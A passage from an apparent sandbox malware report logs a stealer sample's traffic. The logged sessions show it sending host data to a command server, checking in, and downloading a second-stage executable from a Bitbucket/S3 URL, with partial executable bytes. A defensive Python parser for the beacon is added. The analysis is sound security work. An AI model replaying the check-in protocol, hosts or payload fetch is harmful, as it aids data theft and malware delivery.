2024-12-23 07:04:20 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii (chunk size line, then chunk body; line breaks restored from the CRLFs in the raw bytes):
f
ok 8.46.123.189
2024-12-23 07:04:20 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii (terminating zero-length chunk):
0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.10 | 49732 | 104.21.36.201 | 443 | 7200 | C:\Users\user\Desktop\Yh6fS6qfTE.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 07:04:22 UTC | 270 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=NREVLCRG
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 1211
Host: observerfry.lat
2024-12-23 07:04:22 UTC | 1211 | OUT | Data Raw: (hex dump omitted; decoded ASCII below)
Data Ascii (multipart body; line breaks restored from the CRLFs in the raw bytes, dump truncated by the report):
--NREVLCRG
Content-Disposition: form-data; name="hwid"

B67E080D687E6C19AC8923850305D13E
--NREVLCRG
Content-Disposition: form-data; name="pid"

1
--NREVLCRG
Content-Disposition: form-data; name="lid"

LOGS11--LiveTraffic
--NREVLCRG
Content-Di
2024-12-23 07:04:23 UTC | 1130 | IN | HTTP/1.1 200 OK
Date: Mon, 23 Dec 2024 07:04:23 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=rlmsk336o1hbvsv5rsrc9fvp4b; expires=Fri, 18 Apr 2025 00:51:02 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qo3Jtd8dWMHJPTt0Jd7p2Vd%2Fg8KMcnXBPxTEAm1%2FAoXt%2FutfSMJ0iG7wSdpfJneXqkb37rTnsqR4Yxfjvx1PAtDdKA4Y9WaGz%2FQ%2F8xUq0KJBszqNxPjZdzCdXZhsTol2u%2B0%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f667f46f88a42df-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1720&min_rtt=1709&rtt_var=663&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=2117&delivery_rate=1624930&cwnd=237&unsent_bytes=0&cid=ab89e9ca96cda90a&ts=797&x=0"
2024-12-23 07:04:23 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii (chunk size line, then chunk body; line breaks restored from the CRLFs in the raw bytes):
f
ok 8.46.123.189
2024-12-23 07:04:23 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii (terminating zero-length chunk):
0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.10 | 49740 | 104.21.36.201 | 443 | 7200 | C:\Users\user\Desktop\Yh6fS6qfTE.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 07:04:25 UTC | 279 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=7U9NNJRY0XWPO12
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 571438
Host: observerfry.lat
2024-12-23 07:04:25 UTC | 15331 | OUT | Data Raw: (hex dump omitted; decoded ASCII below)
Data Ascii (multipart body; line breaks restored from the CRLFs in the raw bytes, dump truncated by the report):
--7U9NNJRY0XWPO12
Content-Disposition: form-data; name="hwid"

B67E080D687E6C19AC8923850305D13E
--7U9NNJRY0XWPO12
Content-Disposition: form-data; name="pid"

1
--7U9NNJRY0XWPO12
Content-Disposition: form-data; name="lid"

LOGS11--LiveTraffic
-
2024-12-23 07:04:25 UTC | 15331 | OUT | Data Raw: (non-printable binary payload; hex dump omitted)
2024-12-23 07:04:25 UTC | 15331 | OUT | Data Raw: (non-printable binary payload; hex dump omitted)
2024-12-23 07:04:25 UTC | 15331 | OUT | Data Raw: (non-printable binary payload; hex dump omitted)
2024-12-23 07:04:25 UTC | 15331 | OUT | Data Raw: (non-printable binary payload; hex dump omitted)
2024-12-23 07:04:25 UTC | 15331 | OUT | Data Raw: (non-printable binary payload; hex dump omitted)
2024-12-23 07:04:25 UTC | 15331 | OUT | Data Raw: (non-printable binary payload; hex dump omitted)
2024-12-23 07:04:25 UTC | 15331 | OUT | Data Raw: (non-printable binary payload; hex dump omitted)
2024-12-23 07:04:25 UTC | 15331 | OUT | Data Raw: (non-printable binary payload; hex dump omitted)
2024-12-23 07:04:25 UTC | 15331 | OUT | Data Raw: (non-printable binary payload; hex dump omitted)
2024-12-23 07:04:29 UTC | 1137 | IN | HTTP/1.1 200 OK
Date: Mon, 23 Dec 2024 07:04:29 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=ns8leial53q4i19rlff1ivg4bc; expires=Fri, 18 Apr 2025 00:51:06 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2uvq6vhMjUZyw8PBzgFiedcVvfR%2BSyO6yN1w55kV8Tw8EM7uRi1ItVy%2Fmj3pxQEHcV%2FZE%2FRF0%2FTmBnQzYdJC8fyKfXmXRUjn7HaP86y%2BoxbSjIMFRShR3EYbK7SNuQH9onA%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f667f5858cf78d6-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=2013&min_rtt=2006&rtt_var=767&sent=341&recv=593&lost=0&retrans=0&sent_bytes=2837&recv_bytes=573981&delivery_rate=1413359&cwnd=147&unsent_bytes=0&cid=142a48bbeb885cd7&ts=3914&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.10 | 49752 | 104.21.36.201 | 443 | 7200 | C:\Users\user\Desktop\Yh6fS6qfTE.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 07:04:30 UTC | 263 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 88
Host: observerfry.lat
2024-12-23 07:04:30 UTC | 88 | OUT | Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d 26 68 77 69 64 3d 42 36 37 45 30 38 30 44 36 38 37 45 36 43 31 39 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45
Data Ascii: act=get_message&ver=4.0&lid=LOGS11--LiveTraffic&j=&hwid=B67E080D687E6C19AC8923850305D13E
2024-12-23 07:04:31 UTC | 1133 | IN | HTTP/1.1 200 OK
Date: Mon, 23 Dec 2024 07:04:31 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=42lauiptl9ak8pp4id474lcclg; expires=Fri, 18 Apr 2025 00:51:10 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FA00Zb%2FDIGD6d3%2FQKWoBHJnNIRLL5FnSEUbWnSmTTZbDyVgIA7NotG%2FxoVIhG63YIrMMqNXF1qNjaVB5DLpUEX4GPInQ%2B3XU2jgR1AmcoqGHEVtZhD%2B4VbeO%2BGVZX7%2B3Py0%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f667f797c5fc407-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1694&min_rtt=1683&rtt_var=653&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=987&delivery_rate=1646926&cwnd=197&unsent_bytes=0&cid=5f914f5bf63f8183&ts=786&x=0"
2024-12-23 07:04:31 UTC | 198 | IN | Data Raw: 63 30 0d 0a 2f 7a 6a 6a 55 58 2f 77 69 4a 6a 48 47 4d 71 2b 41 57 45 70 6a 71 36 72 7a 34 67 57 6d 39 74 4c 59 70 78 47 57 6a 37 61 66 50 69 6b 51 38 45 6b 58 63 71 71 38 4c 4e 73 75 73 30 37 50 51 62 53 67 63 6d 6d 2f 48 54 75 75 43 41 48 36 47 67 31 54 4c 30 67 31 35 4a 42 6a 54 51 49 68 2b 66 71 72 47 75 36 33 32 49 45 47 4c 79 64 6d 50 36 36 53 72 53 6f 4b 41 7a 34 47 6e 56 61 74 51 75 57 6b 31 65 43 4e 51 79 73 70 39 36 6f 61 71 66 66 64 52 56 41 34 4d 6e 6f 70 2b 6c 6b 38 71 38 71 41 50 41 6a 64 46 75 69 47 64 72 54 47 6f 55 6c 58 63 71 34 74 4f 56 39 36 49 51 77 48 48 51 3d 0d 0a
Data Ascii: c0/zjjUX/wiJjHGMq+AWEpjq6rz4gWm9tLYpxGWj7afPikQ8EkXcqq8LNsus07PQbSgcmm/HTuuCAH6Gg1TL0g15JBjTQIh+fqrGu632IEGLydmP66SrSoKAz4GnVatQuWk1eCNQysp96oaqffdRVA4Mnop+lk8q8qAPAjdFuiGdrTGoUlXcq4tOV96IQwHHQ=
2024-12-23 07:04:31 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0
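Session 7 is the stealer's check-in: a form-encoded POST to /api whose act, ver, lid and hwid fields identify the beacon, answered by a single base64 string delivered as one chunked body. The following Python is an added example, not part of the Joe Sandbox report and not the sample's own code. It parses the request body and the chunked reply transcribed from this session; the field semantics (lid as a build or campaign tag, hwid as a 32-character hex host identifier) and the classification heuristics are inferred from the visible traffic rather than taken from a protocol specification, and the decoded reply is left as opaque bytes because the report only states that LummaC encrypts its strings and does not show the scheme.

```python
"""Pull LummaC-style check-in indicators out of a captured HTTP exchange.

Added example, not code from the Joe Sandbox report or from the sample.
Request body and chunked response are transcribed from session 7 above.
Field meanings and the beacon heuristics are assumptions drawn from that
capture, not from a published protocol description.
"""
import base64
import re
from urllib.parse import parse_qs

# Transcribed from the capture (session 7, POST /api to observerfry.lat).
CAPTURED_REQUEST_BODY = (
    "act=get_message&ver=4.0&lid=LOGS11--LiveTraffic&j="
    "&hwid=B67E080D687E6C19AC8923850305D13E"
)
# Transcribed chunked response body (the two IN records: "c0" chunk, then "0").
CAPTURED_RESPONSE_BODY = (
    b"c0\r\n"
    b"/zjjUX/wiJjHGMq+AWEpjq6rz4gWm9tLYpxGWj7afPikQ8EkXcqq8LNsus07PQbSgcmm/HTuuCAH6"
    b"Gg1TL0g15JBjTQIh+fqrGu632IEGLydmP66SrSoKAz4GnVatQuWk1eCNQysp96oaqffdRVA4Mnop"
    b"+lk8q8qAPAjdFuiGdrTGoUlXcq4tOV96IQwHHQ="
    b"\r\n0\r\n\r\n"
)

HEX32 = re.compile(r"^[0-9A-F]{32}$")


def parse_beacon(body: str) -> dict:
    """Parse the form-encoded beacon; each field appears once, so flatten the lists."""
    fields = parse_qs(body, keep_blank_values=True)  # keep the empty j= field
    return {k: v[0] for k, v in fields.items()}


def classify_beacon(fields: dict) -> list[str]:
    """Return the reasons this request looks like a LummaC-style check-in.

    Heuristics (assumption): the act/ver/lid/hwid field set, act=get_message,
    and a 32-character uppercase hex hwid, all as seen in the capture above.
    """
    reasons = []
    if {"act", "ver", "lid", "hwid"} <= fields.keys():
        reasons.append("act/ver/lid/hwid field set")
    if fields.get("act") == "get_message":
        reasons.append("act=get_message")
    if HEX32.match(fields.get("hwid", "")):
        reasons.append("hwid is 32-char uppercase hex")
    return reasons


def dechunk(raw: bytes) -> bytes:
    """Reassemble a chunked transfer-encoded body (chunk-size line, data, CRLF, ... , 0)."""
    out = bytearray()
    pos = 0
    while True:
        end = raw.index(b"\r\n", pos)
        size = int(raw[pos:end].split(b";")[0], 16)  # drop any chunk extension
        pos = end + 2
        if size == 0:
            break
        out += raw[pos:pos + size]
        pos += size + 2  # skip the chunk data and its trailing CRLF
    return bytes(out)


def decode_response(raw: bytes) -> bytes:
    """De-chunk and base64-decode the reply. The result stays opaque: this
    example makes no attempt to decrypt it."""
    return base64.b64decode(dechunk(raw), validate=True)


if __name__ == "__main__":
    beacon = parse_beacon(CAPTURED_REQUEST_BODY)
    print(beacon)
    print(classify_beacon(beacon))
    print(len(decode_response(CAPTURED_RESPONSE_BODY)), "bytes of opaque payload")
```

The same parser applies to a decrypted capture of any of the sample's later check-ins; the hwid is the natural pivot key for tying sessions to one infected host, and the lid the key for grouping samples by campaign.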


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.10 | 49758 | 185.166.143.50 | 443 | 7200 | C:\Users\user\Desktop\Yh6fS6qfTE.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 07:04:32 UTC | 248 | OUT | GET /mynewworkspace123312/scnd/downloads/FormattingCharitable.exe HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Host: bitbucket.org
2024-12-23 07:04:33 UTC | 5946 | IN | HTTP/1.1 302 Found
Date: Mon, 23 Dec 2024 07:04:33 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 0
Server: AtlassianEdge
                                                                                                                                                                    Location: https://bbuseruploads.s3.amazonaws.com/70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-464c-9988-4c3c4d541130/FormattingCharitable.exe?response-content-disposition=attachment%3B%20filename%3D%22FormattingCharitable.exe%22&AWSAccessKeyId=ASIA6KOSE3BNNRVK3O6C&Signature=bByUD0dwbg83H%2B08dW7zc8pOm%2Bg%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEAcaCXVzLWVhc3QtMSJGMEQCIC%2B3%2BjjbUGy0cjpzRRt6zZkEP8eYcNsEXxJyxzBfB3lyAiBIwHqx1SbPwC93UpRITG%2FtrJmfMbZ%2FMXMhi%2BrpeiLhTSqwAgjQ%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F8BEAAaDDk4NDUyNTEwMTE0NiIMr97ZQWydwtjVD%2FpUKoQCHlbL64aNAUs4s7esfnGXOd9hXvgq4lUh%2FQ0cD%2FYV5YaiDhEKUfk%2B7GlLTWJfer66qWqqXLx8kitt6%2FA4KK5y64dXWwliu0m0tn1smPd2eoWfQIpk9bYGZwtZB5Scx2vR942g3DzN%2Fvdodbo3w6cqKqQy2ODgJOCBPHZ9P1ANP6B%2BNTBekl2XQwIqFwe7DJSORVZm7%2BEwOihmeCtNTLNto5dobnF5VOueL3lrsMTg7mCaNjr9mVsieDw%2FsO3a%2Fxh3Dx8zzj57LdQ%2FRCMdgUookY1HthLgxHwTapScSAJbiw0Tz0v3em5jIi5Jfz4z0KsfJ9sVcTEzP9i1MdEYNBll3KE8eNIw7ZCkuwY6ngGd2muSZEx%2BEhQWHxRfS%2FkoWFVkYiveDA%2FCxx59WBWRi1RllYutEaisKs85SZO4fX2Jcmo [TRUNCATED]
Expires: Mon, 23 Dec 2024 07:04:33 GMT
Cache-Control: max-age=0, no-cache, no-store, must-revalidate, private
X-Used-Mesh: False
Vary: Accept-Language, Origin
Content-Language: en
X-View-Name: bitbucket.apps.downloads.views.download_file
X-Dc-Location: Micros-3
X-Served-By: d9bfadc713c0
X-Version: c9b3998323c0
X-Static-Version: c9b3998323c0
X-Request-Count: 4203
X-Render-Time: 0.04418206214904785
X-B3-Traceid: 01c036bc3e9e4a8e88a6851f2eba33b0
X-B3-Spanid: 357918763abe2afb
X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    Content-Security-Policy: frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com bitbucket.org; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net atlassianblog.wpengine.com id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.se [TRUNCATED]
X-Usage-Quota-Remaining: 999075.054
X-Usage-Request-Cost: 937.80
X-Usage-User-Time: 0.022875
X-Usage-System-Time: 0.005259
X-Usage-Input-Ops: 0
X-Usage-Output-Ops: 0
Age: 0
X-Cache: MISS
X-Content-Type-Options: nosniff
X-Xss-Protection: 1; mode=block
Atl-Traceid: 01c036bc3e9e4a8e88a6851f2eba33b0
Atl-Request-Id: 01c036bc-3e9e-4a8e-88a6-851f2eba33b0
Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
Report-To: {"endpoints": [{"url": "https://dz8aopenkvv6s.cloudfront.net"}], "group": "endpoint-1", "include_subdomains": true, "max_age": 600}
Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
Server-Timing: atl-edge;dur=153,atl-edge-internal;dur=3,atl-edge-upstream;dur=151,atl-edge-pop;desc="aws-eu-central-1"
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.10 | 49764 | 52.217.18.140 | 443 | 7200 | C:\Users\user\Desktop\Yh6fS6qfTE.exe
Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                    2024-12-23 07:04:35 UTC1354OUTGET /70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-464c-9988-4c3c4d541130/FormattingCharitable.exe?response-content-disposition=attachment%3B%20filename%3D%22FormattingCharitable.exe%22&AWSAccessKeyId=ASIA6KOSE3BNNRVK3O6C&Signature=bByUD0dwbg83H%2B08dW7zc8pOm%2Bg%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEAcaCXVzLWVhc3QtMSJGMEQCIC%2B3%2BjjbUGy0cjpzRRt6zZkEP8eYcNsEXxJyxzBfB3lyAiBIwHqx1SbPwC93UpRITG%2FtrJmfMbZ%2FMXMhi%2BrpeiLhTSqwAgjQ%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F8BEAAaDDk4NDUyNTEwMTE0NiIMr97ZQWydwtjVD%2FpUKoQCHlbL64aNAUs4s7esfnGXOd9hXvgq4lUh%2FQ0cD%2FYV5YaiDhEKUfk%2B7GlLTWJfer66qWqqXLx8kitt6%2FA4KK5y64dXWwliu0m0tn1smPd2eoWfQIpk9bYGZwtZB5Scx2vR942g3DzN%2Fvdodbo3w6cqKqQy2ODgJOCBPHZ9P1ANP6B%2BNTBekl2XQwIqFwe7DJSORVZm7%2BEwOihmeCtNTLNto5dobnF5VOueL3lrsMTg7mCaNjr9mVsieDw%2FsO3a%2Fxh3Dx8zzj57LdQ%2FRCMdgUookY1HthLgxHwTapScSAJbiw0Tz0v3em5jIi5Jfz4z0KsfJ9sVcTEzP9i1MdEYNBll3KE8eNIw7ZCkuwY6ngGd2muSZEx%2BEhQWHxRfS%2FkoWFVkYiveDA%2FCxx59WBWRi1RllYutEaisKs85SZO4fX2JcmoM7yMSgbDsoQ0cWoQJiuLny%2BOgtUxL0Kt2wR5hwGCVr [TRUNCATED]
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Host: bbuseruploads.s3.amazonaws.com
2024-12-23 07:04:35 UTC | 554 | IN | HTTP/1.1 200 OK
x-amz-id-2: djsLGeQE4jl88BZlBRpGpdORRyW8HGbYRMev4vswzwz/ykpv71J1ehM//ynwGDAPkO+Zjph5ep4=
x-amz-request-id: MV63YDRKHN6GTVRD
Date: Mon, 23 Dec 2024 07:04:36 GMT
Last-Modified: Sun, 22 Dec 2024 18:56:57 GMT
ETag: "73565a0bcdcb7ff5f9ce005a2530e215"
x-amz-server-side-encryption: AES256
x-amz-version-id: 7hbzHT1uhpKzZ7nBtmVCaxIrBpJnNbOS
Content-Disposition: attachment; filename="FormattingCharitable.exe"
Accept-Ranges: bytes
Content-Type: application/x-msdownload
Content-Length: 1325507
Server: AmazonS3
Connection: close
                                                                                                                                                                    2024-12-23 07:04:35 UTC16384INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 41 7b d1 6b 05 1a bf 38 05 1a bf 38 05 1a bf 38 0c 62 3c 38 06 1a bf 38 0c 62 2c 38 14 1a bf 38 05 1a be 38 a9 1a bf 38 1e 87 15 38 09 1a bf 38 1e 87 25 38 04 1a bf 38 1e 87 22 38 04 1a bf 38 52 69 63 68 05 1a bf 38 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 e4 e2 47 4f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 74 00 00 00 f0 0b 00 00 42 00 00 af 38 00 00 00 10 00
                                                                                                                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$A{k888b<88b,888888%88"88Rich8PELGOtB8
                                                                                                                                                                    2024-12-23 07:04:35 UTC470INData Raw: 00 ff 75 f8 e8 bb f1 ff ff e9 7b 03 00 00 ff 75 fc e8 ae f1 ff ff 33 db 81 7d 0c 05 04 00 00 75 11 89 5d 10 c7 45 14 01 00 00 00 c7 45 0c 0f 04 00 00 83 7d 0c 4e b8 13 04 00 00 74 09 39 45 0c 0f 85 dc 00 00 00 8b 7d 14 39 45 0c 74 0d 81 7f 04 08 04 00 00 0f 85 c7 00 00 00 f7 05 08 eb 47 00 00 02 00 00 75 79 39 45 0c 74 09 8b 4d 14 83 79 08 fe 75 6b 33 c9 39 45 0c 0f 95 c1 51 ff 75 fc e8 f4 fb ff ff 3b c3 7c 56 8b 55 e8 8b c8 69 c9 20 40 00 00 8d 54 11 08 8b 0a f6 c1 10 75 40 f6 c1 40 74 14 81 f1 80 00 00 00 84 c9 79 05 83 c9 01 eb 08 83 e1 fe eb 03 83 f1 01 50 89 0a e8 c2 c4 ff ff a1 08 eb 47 00 33 c9 c1 e8 08 41 f7 d0 23 c1 89 4d 10 89 45 14 c7 45 0c 0f 04 00 00 3b fb 74 3e 81 7f 08 3d fe ff ff 75 0e ff 77 5c 53 68 19 04 00 00 ff 75 fc ff d6 81 7f 08 39
                                                                                                                                                                    Data Ascii: u{u3}u]EE}Nt9E}9EtGuy9EtMyuk39EQu;|VUi @Tu@@tyPG3A#MEE;t>=uw\Shu9
                                                                                                                                                                    2024-12-23 07:04:36 UTC16384INData Raw: 07 50 ff 15 30 91 40 00 89 1d 68 1d 44 00 89 1d 6c 1d 44 00 89 1d 10 eb 47 00 81 7d 0c 0f 04 00 00 0f 85 4b 01 00 00 53 53 e8 f4 c3 ff ff 39 5d 10 74 07 6a 08 e8 0d c6 ff ff 39 5d 14 74 3f ff 35 6c 1d 44 00 e8 d1 c4 ff ff 8b f8 57 e8 7e c4 ff ff 33 c0 33 c9 3b fb 7e 0e 8b 55 e4 39 1c 82 74 01 41 40 3b c7 7c f2 53 51 68 4e 01 00 00 ff 75 f8 ff d6 89 7d 14 c7 45 0c 20 04 00 00 53 53 e8 9d c3 ff ff a1 6c 1d 44 00 89 45 e0 a1 c8 ea 47 00 c7 45 c4 30 f0 00 00 89 5d e8 39 1d cc ea 47 00 0f 8e a1 00 00 00 8d 78 08 8b 45 e0 8b 4d e8 8b 04 88 3b c3 74 79 8b 0f 89 45 bc c7 45 b8 08 00 00 00 f7 c1 00 01 00 00 74 13 8d 47 10 c7 45 b8 09 00 00 00 89 45 c8 81 27 ff fe ff ff f6 c1 40 74 05 6a 03 58 eb 0e 8b c1 83 e0 01 40 f6 c1 10 74 03 83 c0 03 ff 75 bc 8b d1 c1 e0 0b
                                                                                                                                                                    Data Ascii: P0@hDlDG}KSS9]tj9]t?5lDW~33;~U9tA@;|SQhNu}E SSlDEGE0]9GxEM;tyEEtGEE'@tjX@tu
                                                                                                                                                                    2024-12-23 07:04:36 UTC1024INData Raw: 3a 00 20 00 73 00 74 00 61 00 63 00 6b 00 20 00 65 00 6d 00 70 00 74 00 79 00 00 00 00 00 45 00 78 00 63 00 68 00 3a 00 20 00 73 00 74 00 61 00 63 00 6b 00 20 00 3c 00 20 00 25 00 64 00 20 00 65 00 6c 00 65 00 6d 00 65 00 6e 00 74 00 73 00 00 00 52 00 4d 00 44 00 69 00 72 00 3a 00 20 00 22 00 25 00 73 00 22 00 00 00 4d 00 65 00 73 00 73 00 61 00 67 00 65 00 42 00 6f 00 78 00 3a 00 20 00 25 00 64 00 2c 00 22 00 25 00 73 00 22 00 00 00 44 00 65 00 6c 00 65 00 74 00 65 00 3a 00 20 00 22 00 25 00 73 00 22 00 00 00 00 00 25 00 73 00 00 00 00 00 46 00 69 00 6c 00 65 00 3a 00 20 00 77 00 72 00 6f 00 74 00 65 00 20 00 25 00 64 00 20 00 74 00 6f 00 20 00 22 00 25 00 73 00 22 00 00 00 00 00 46 00 69 00 6c 00 65 00 3a 00 20 00 65 00 72 00 72 00 6f 00 72 00 2c 00 20
                                                                                                                                                                    Data Ascii: : stack emptyExch: stack < %d elementsRMDir: "%s"MessageBox: %d,"%s"Delete: "%s"%sFile: wrote %d to "%s"File: error,
                                                                                                                                                                    2024-12-23 07:04:36 UTC16384INData Raw: 3a 00 20 00 63 00 61 00 6e 00 27 00 74 00 20 00 63 00 72 00 65 00 61 00 74 00 65 00 20 00 22 00 25 00 73 00 22 00 20 00 2d 00 20 00 61 00 20 00 66 00 69 00 6c 00 65 00 20 00 61 00 6c 00 72 00 65 00 61 00 64 00 79 00 20 00 65 00 78 00 69 00 73 00 74 00 73 00 00 00 00 00 43 00 72 00 65 00 61 00 74 00 65 00 44 00 69 00 72 00 65 00 63 00 74 00 6f 00 72 00 79 00 3a 00 20 00 63 00 61 00 6e 00 27 00 74 00 20 00 63 00 72 00 65 00 61 00 74 00 65 00 20 00 22 00 25 00 73 00 22 00 20 00 28 00 65 00 72 00 72 00 3d 00 25 00 64 00 29 00 00 00 43 00 72 00 65 00 61 00 74 00 65 00 44 00 69 00 72 00 65 00 63 00 74 00 6f 00 72 00 79 00 3a 00 20 00 22 00 25 00 73 00 22 00 20 00 28 00 25 00 64 00 29 00 00 00 00 00 53 00 65 00 74 00 46 00 69 00 6c 00 65 00 41 00 74 00 74 00 72
                                                                                                                                                                    Data Ascii: : can't create "%s" - a file already existsCreateDirectory: can't create "%s" (err=%d)CreateDirectory: "%s" (%d)SetFileAttr
